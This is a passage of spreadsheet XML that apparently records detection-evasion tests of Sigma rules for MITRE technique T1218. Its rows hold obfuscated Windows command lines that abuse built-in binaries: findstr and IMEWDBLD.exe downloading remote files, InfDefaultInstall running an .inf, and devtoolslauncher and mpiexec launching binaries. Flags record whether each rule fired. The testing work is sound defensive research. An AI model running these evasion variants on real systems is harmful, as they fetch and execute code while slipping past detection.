          <t>Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa); Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa)</t>
        </is>
      </c>
      <c r="J3662" s="44" t="n"/>
      <c r="K3662" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3663" ht="15.75" customHeight="1" s="42">
      <c r="A3663" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3663" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C3663" s="44" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D3663" s="44" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E3663" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c findstr.exe /v^  /l^  "TEST-HOST" \\example.com\share\test.txt</t>
        </is>
      </c>
      <c r="F3663" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3663" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3663" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3663" s="44" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa)</t>
        </is>
      </c>
      <c r="J3663" s="44" t="n"/>
      <c r="K3663" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3664" ht="15.75" customHeight="1" s="42">
      <c r="A3664" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3664" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iexpress_susp_execution</t>
        </is>
      </c>
      <c r="C3664" s="44" t="inlineStr">
        <is>
          <t>Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location</t>
        </is>
      </c>
      <c r="D3664" s="44" t="inlineStr">
        <is>
          <t>b2b048b0-7857-4380-b0fb-d3f0ab820b71</t>
        </is>
      </c>
      <c r="E3664" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c iexpress.exe /^n C:\Temp\package.sed</t>
        </is>
      </c>
      <c r="F3664" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3664" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3664" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3664" s="44" t="inlineStr">
        <is>
          <t>Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location (b2b048b0-7857-4380-b0fb-d3f0ab820b71)</t>
        </is>
      </c>
      <c r="J3664" s="44" t="n"/>
      <c r="K3664" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3665" ht="15.75" customHeight="1" s="42">
      <c r="A3665" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3665" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iexpress_susp_execution</t>
        </is>
      </c>
      <c r="C3665" s="44" t="inlineStr">
        <is>
          <t>Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location</t>
        </is>
      </c>
      <c r="D3665" s="44" t="inlineStr">
        <is>
          <t>b2b048b0-7857-4380-b0fb-d3f0ab820b71</t>
        </is>
      </c>
      <c r="E3665" s="44" t="inlineStr">
        <is>
          <t>iexpress.exe  /n  C:\Temp\package.sed</t>
        </is>
      </c>
      <c r="F3665" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3665" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3665" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3665" s="44" t="inlineStr">
        <is>
          <t>Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location (b2b048b0-7857-4380-b0fb-d3f0ab820b71)</t>
        </is>
      </c>
      <c r="J3665" s="44" t="n"/>
      <c r="K3665" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3666" ht="15.75" customHeight="1" s="42">
      <c r="A3666" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3666" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C3666" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D3666" s="44" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E3666" s="44" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\System32\IME\SHARED\IMEWDBLD.exe" HTTPS://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml</t>
        </is>
      </c>
      <c r="F3666" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3666" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3666" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3666" s="44" t="n"/>
      <c r="J3666" s="44" t="n"/>
      <c r="K3666" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3667" ht="15.75" customHeight="1" s="42">
      <c r="A3667" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3667" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C3667" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D3667" s="44" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E3667" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\WINDOWS\System32\IME\SHARED\IMEWDBLD.exe" http^s://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml</t>
        </is>
      </c>
      <c r="F3667" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3667" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3667" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3667" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE (863218bd-c7d0-4c52-80cd-0a96c09f54af)</t>
        </is>
      </c>
      <c r="J3667" s="44" t="n"/>
      <c r="K3667" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3668" ht="15.75" customHeight="1" s="42">
      <c r="A3668" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3668" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C3668" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D3668" s="44" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E3668" s="44" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\System32\IME\SHARED\IMEWDBLD.exe" hwtwtwpts://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml</t>
        </is>
      </c>
      <c r="F3668" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3668" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3668" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3668" s="44" t="n"/>
      <c r="J3668" s="44" t="n"/>
      <c r="K3668" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3669" ht="15.75" customHeight="1" s="42">
      <c r="A3669" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3669" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_infdefaultinstall_execute_sct_scripts</t>
        </is>
      </c>
      <c r="C3669" s="44" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution</t>
        </is>
      </c>
      <c r="D3669" s="44" t="inlineStr">
        <is>
          <t>ce7cf472-6fcc-490a-9481-3786840b5d9b</t>
        </is>
      </c>
      <c r="E3669" s="44" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe	"C:\AtomicRedTeam\atomics\T1218\src\Infdefaultinstall.inf"</t>
        </is>
      </c>
      <c r="F3669" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3669" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3669" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3669" s="44" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution (ce7cf472-6fcc-490a-9481-3786840b5d9b)</t>
        </is>
      </c>
      <c r="J3669" s="44" t="n"/>
      <c r="K3669" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3670" ht="15.75" customHeight="1" s="42">
      <c r="A3670" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3670" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_infdefaultinstall_execute_sct_scripts</t>
        </is>
      </c>
      <c r="C3670" s="44" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution</t>
        </is>
      </c>
      <c r="D3670" s="44" t="inlineStr">
        <is>
          <t>ce7cf472-6fcc-490a-9481-3786840b5d9b</t>
        </is>
      </c>
      <c r="E3670" s="44" t="inlineStr">
        <is>
          <t>"InfDefaultInstall.exe" "C:\AtomicRedTeam\atomics\T1218\src\Infdefaultinstall.inf"</t>
        </is>
      </c>
      <c r="F3670" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3670" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3670" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3670" s="44" t="n"/>
      <c r="J3670" s="44" t="n"/>
      <c r="K3670" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3671" ht="15.75" customHeight="1" s="42">
      <c r="A3671" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3671" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_infdefaultinstall_execute_sct_scripts</t>
        </is>
      </c>
      <c r="C3671" s="44" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution</t>
        </is>
      </c>
      <c r="D3671" s="44" t="inlineStr">
        <is>
          <t>ce7cf472-6fcc-490a-9481-3786840b5d9b</t>
        </is>
      </c>
      <c r="E3671" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c InfDefaultInst^all.exe "C:\AtomicRedTeam\atomics\T1218\src\Infdefaultinstall.inf"</t>
        </is>
      </c>
      <c r="F3671" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3671" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3671" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3671" s="44" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution (ce7cf472-6fcc-490a-9481-3786840b5d9b)</t>
        </is>
      </c>
      <c r="J3671" s="44" t="n"/>
      <c r="K3671" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3672" ht="15.75" customHeight="1" s="42">
      <c r="A3672" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3672" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_infdefaultinstall_execute_sct_scripts</t>
        </is>
      </c>
      <c r="C3672" s="44" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution</t>
        </is>
      </c>
      <c r="D3672" s="44" t="inlineStr">
        <is>
          <t>ce7cf472-6fcc-490a-9481-3786840b5d9b</t>
        </is>
      </c>
      <c r="E3672" s="44" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe  "C:\AtomicRedTeam\atomics\T1218\src\Infdefaultinstall.inf"</t>
        </is>
      </c>
      <c r="F3672" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3672" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3672" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3672" s="44" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution (ce7cf472-6fcc-490a-9481-3786840b5d9b); InfDefaultInstall.exe .inf Execution (ce7cf472-6fcc-490a-9481-3786840b5d9b)</t>
        </is>
      </c>
      <c r="J3672" s="44" t="n"/>
      <c r="K3672" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3673" ht="15.75" customHeight="1" s="42">
      <c r="A3673" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3673" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_infdefaultinstall_execute_sct_scripts</t>
        </is>
      </c>
      <c r="C3673" s="44" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution</t>
        </is>
      </c>
      <c r="D3673" s="44" t="inlineStr">
        <is>
          <t>ce7cf472-6fcc-490a-9481-3786840b5d9b</t>
        </is>
      </c>
      <c r="E3673" s="44" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe "C:\AtomicRedTeam\atomics\T1218\src\Infdefaultinstall.inf "</t>
        </is>
      </c>
      <c r="F3673" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3673" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3673" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3673" s="44" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution (ce7cf472-6fcc-490a-9481-3786840b5d9b); InfDefaultInstall.exe .inf Execution (ce7cf472-6fcc-490a-9481-3786840b5d9b)</t>
        </is>
      </c>
      <c r="J3673" s="44" t="n"/>
      <c r="K3673" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3674" ht="15.75" customHeight="1" s="42">
      <c r="A3674" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3674" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ldifde_file_load</t>
        </is>
      </c>
      <c r="C3674" s="44" t="inlineStr">
        <is>
          <t>Import LDAP Data Interchange Format File Via Ldifde.EXE</t>
        </is>
      </c>
      <c r="D3674" s="44" t="inlineStr">
        <is>
          <t>6f535e01-ca1f-40be-ab8d-45b19c0c8b7f</t>
        </is>
      </c>
      <c r="E3674" s="44" t="inlineStr">
        <is>
          <t>ldifde.exe /i /f C:\Temp\import.ldif</t>
        </is>
      </c>
      <c r="F3674" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3674" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3674" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3674" s="44" t="n"/>
      <c r="J3674" s="44" t="n"/>
      <c r="K3674" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3675" ht="15.75" customHeight="1" s="42">
      <c r="A3675" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3675" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ldifde_file_load</t>
        </is>
      </c>
      <c r="C3675" s="44" t="inlineStr">
        <is>
          <t>Import LDAP Data Interchange Format File Via Ldifde.EXE</t>
        </is>
      </c>
      <c r="D3675" s="44" t="inlineStr">
        <is>
          <t>6f535e01-ca1f-40be-ab8d-45b19c0c8b7f</t>
        </is>
      </c>
      <c r="E3675" s="44" t="inlineStr">
        <is>
          <t>ldifde.exe -f C:\Temp\import.ldif -i</t>
        </is>
      </c>
      <c r="F3675" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3675" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3675" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3675" s="44" t="n"/>
      <c r="J3675" s="44" t="n"/>
      <c r="K3675" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3676" ht="15.75" customHeight="1" s="42">
      <c r="A3676" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3676" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ldifde_file_load</t>
        </is>
      </c>
      <c r="C3676" s="44" t="inlineStr">
        <is>
          <t>Import LDAP Data Interchange Format File Via Ldifde.EXE</t>
        </is>
      </c>
      <c r="D3676" s="44" t="inlineStr">
        <is>
          <t>6f535e01-ca1f-40be-ab8d-45b19c0c8b7f</t>
        </is>
      </c>
      <c r="E3676" s="44" t="inlineStr">
        <is>
          <t>ldifde.exe "-i" "-f" C:\Temp\import.ldif</t>
        </is>
      </c>
      <c r="F3676" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3676" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3676" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3676" s="44" t="n"/>
      <c r="J3676" s="44" t="n"/>
      <c r="K3676" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3677" ht="15.75" customHeight="1" s="42">
      <c r="A3677" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3677" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ldifde_file_load</t>
        </is>
      </c>
      <c r="C3677" s="44" t="inlineStr">
        <is>
          <t>Import LDAP Data Interchange Format File Via Ldifde.EXE</t>
        </is>
      </c>
      <c r="D3677" s="44" t="inlineStr">
        <is>
          <t>6f535e01-ca1f-40be-ab8d-45b19c0c8b7f</t>
        </is>
      </c>
      <c r="E3677" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c ldifde.exe -^i -^f C:\Temp\import.ldif</t>
        </is>
      </c>
      <c r="F3677" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3677" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3677" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3677" s="44" t="n"/>
      <c r="J3677" s="44" t="n"/>
      <c r="K3677" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3678" ht="15.75" customHeight="1" s="42">
      <c r="A3678" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3678" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_link_uncommon_parent_process</t>
        </is>
      </c>
      <c r="C3678" s="44" t="inlineStr">
        <is>
          <t>Uncommon Link.EXE Parent Process</t>
        </is>
      </c>
      <c r="D3678" s="44" t="inlineStr">
        <is>
          <t>6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6</t>
        </is>
      </c>
      <c r="E3678" s="44" t="inlineStr">
        <is>
          <t>LINK -/help</t>
        </is>
      </c>
      <c r="F3678" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3678" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3678" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3678" s="44" t="n"/>
      <c r="J3678" s="44" t="n"/>
      <c r="K3678" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3679" ht="15.75" customHeight="1" s="42">
      <c r="A3679" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3679" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_link_uncommon_parent_process</t>
        </is>
      </c>
      <c r="C3679" s="44" t="inlineStr">
        <is>
          <t>Uncommon Link.EXE Parent Process</t>
        </is>
      </c>
      <c r="D3679" s="44" t="inlineStr">
        <is>
          <t>6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6</t>
        </is>
      </c>
      <c r="E3679" s="44" t="inlineStr">
        <is>
          <t>"LINK" /help</t>
        </is>
      </c>
      <c r="F3679" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3679" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3679" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3679" s="44" t="n"/>
      <c r="J3679" s="44" t="n"/>
      <c r="K3679" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3680" ht="15.75" customHeight="1" s="42">
      <c r="A3680" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3680" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_devtoolslauncher</t>
        </is>
      </c>
      <c r="C3680" s="44" t="inlineStr">
        <is>
          <t>Devtoolslauncher.exe Executes Specified Binary</t>
        </is>
      </c>
      <c r="D3680" s="44" t="inlineStr">
        <is>
          <t>cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6</t>
        </is>
      </c>
      <c r="E3680" s="44" t="inlineStr">
        <is>
          <t>devtoolslauncher.exe LaunchFor''Deploy C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F3680" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3680" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3680" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3680" s="44" t="n"/>
      <c r="J3680" s="44" t="n"/>
      <c r="K3680" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3681" ht="15.75" customHeight="1" s="42">
      <c r="A3681" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3681" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_devtoolslauncher</t>
        </is>
      </c>
      <c r="C3681" s="44" t="inlineStr">
        <is>
          <t>Devtoolslauncher.exe Executes Specified Binary</t>
        </is>
      </c>
      <c r="D3681" s="44" t="inlineStr">
        <is>
          <t>cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6</t>
        </is>
      </c>
      <c r="E3681" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c devtoolslauncher.exe LaunchForDe^ploy C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F3681" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3681" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3681" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3681" s="44" t="n"/>
      <c r="J3681" s="44" t="n"/>
      <c r="K3681" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3682" ht="15.75" customHeight="1" s="42">
      <c r="A3682" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3682" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_devtoolslauncher</t>
        </is>
      </c>
      <c r="C3682" s="44" t="inlineStr">
        <is>
          <t>Devtoolslauncher.exe Executes Specified Binary</t>
        </is>
      </c>
      <c r="D3682" s="44" t="inlineStr">
        <is>
          <t>cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6</t>
        </is>
      </c>
      <c r="E3682" s="44" t="inlineStr">
        <is>
          <t>devtoolslauncher.exe LaunchFor""Deploy C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F3682" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3682" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3682" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3682" s="44" t="n"/>
      <c r="J3682" s="44" t="n"/>
      <c r="K3682" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3683" ht="15.75" customHeight="1" s="42">
      <c r="A3683" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3683" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gpscript</t>
        </is>
      </c>
      <c r="C3683" s="44" t="inlineStr">
        <is>
          <t>Gpscript Execution</t>
        </is>
      </c>
      <c r="D3683" s="44" t="inlineStr">
        <is>
          <t>1e59c230-6670-45bf-83b0-98903780607e</t>
        </is>
      </c>
      <c r="E3683" s="44" t="inlineStr">
        <is>
          <t>gpscript.exe /logon</t>
        </is>
      </c>
      <c r="F3683" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3683" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3683" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3683" s="44" t="n"/>
      <c r="J3683" s="44" t="n"/>
      <c r="K3683" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3684" ht="15.75" customHeight="1" s="42">
      <c r="A3684" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3684" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gpscript</t>
        </is>
      </c>
      <c r="C3684" s="44" t="inlineStr">
        <is>
          <t>Gpscript Execution</t>
        </is>
      </c>
      <c r="D3684" s="44" t="inlineStr">
        <is>
          <t>1e59c230-6670-45bf-83b0-98903780607e</t>
        </is>
      </c>
      <c r="E3684" s="44" t="inlineStr">
        <is>
          <t>gpscript.exe	/logon</t>
        </is>
      </c>
      <c r="F3684" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3684" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3684" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3684" s="44" t="n"/>
      <c r="J3684" s="44" t="n"/>
      <c r="K3684" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3685" ht="15.75" customHeight="1" s="42">
      <c r="A3685" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3685" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gpscript</t>
        </is>
      </c>
      <c r="C3685" s="44" t="inlineStr">
        <is>
          <t>Gpscript Execution</t>
        </is>
      </c>
      <c r="D3685" s="44" t="inlineStr">
        <is>
          <t>1e59c230-6670-45bf-83b0-98903780607e</t>
        </is>
      </c>
      <c r="E3685" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c gpscript.exe /log^on</t>
        </is>
      </c>
      <c r="F3685" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3685" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3685" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3685" s="44" t="n"/>
      <c r="J3685" s="44" t="n"/>
      <c r="K3685" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3686" ht="15.75" customHeight="1" s="42">
      <c r="A3686" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3686" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gpscript</t>
        </is>
      </c>
      <c r="C3686" s="44" t="inlineStr">
        <is>
          <t>Gpscript Execution</t>
        </is>
      </c>
      <c r="D3686" s="44" t="inlineStr">
        <is>
          <t>1e59c230-6670-45bf-83b0-98903780607e</t>
        </is>
      </c>
      <c r="E3686" s="44" t="inlineStr">
        <is>
          <t>gpscript.exe  /logon</t>
        </is>
      </c>
      <c r="F3686" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3686" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3686" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3686" s="44" t="n"/>
      <c r="J3686" s="44" t="n"/>
      <c r="K3686" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3687" ht="15.75" customHeight="1" s="42">
      <c r="A3687" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3687" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mpiexec</t>
        </is>
      </c>
      <c r="C3687" s="44" t="inlineStr">
        <is>
          <t>MpiExec Lolbin</t>
        </is>
      </c>
      <c r="D3687" s="44" t="inlineStr">
        <is>
          <t>729ce0ea-5d8f-4769-9762-e35de441586d</t>
        </is>
      </c>
      <c r="E3687" s="44" t="inlineStr">
        <is>
          <t>mpiexec.exe	-n	1	calc.exe</t>
        </is>
      </c>
      <c r="F3687" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3687" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3687" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3687" s="44" t="n"/>
      <c r="J3687" s="44" t="n"/>
      <c r="K3687" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3688" ht="15.75" customHeight="1" s="42">
      <c r="A3688" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3688" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mpiexec</t>
        </is>
      </c>
      <c r="C3688" s="44" t="inlineStr">
        <is>
          <t>MpiExec Lolbin</t>
        </is>
      </c>
      <c r="D3688" s="44" t="inlineStr">
        <is>
          <t>729ce0ea-5d8f-4769-9762-e35de441586d</t>
        </is>
      </c>
      <c r="E3688" s="44" t="inlineStr">
        <is>
          <t>mpiexec.exe "-n" 1 calc.exe</t>
        </is>
      </c>
      <c r="F3688" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3688" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3688" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3688" s="44" t="n"/>
      <c r="J3688" s="44" t="n"/>
      <c r="K3688" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3689" ht="15.75" customHeight="1" s="42">
      <c r="A3689" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3689" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mpiexec</t>
        </is>
      </c>
      <c r="C3689" s="44" t="inlineStr">
        <is>
          <t>MpiExec Lolbin</t>
        </is>
      </c>
      <c r="D3689" s="44" t="inlineStr">
        <is>
          <t>729ce0ea-5d8f-4769-9762-e35de441586d</t>
        </is>
      </c>
      <c r="E3689" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c mpiexec.exe -^n 1 calc.exe</t>
        </is>
      </c>
      <c r="F3689" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3689" s="44" t="b">
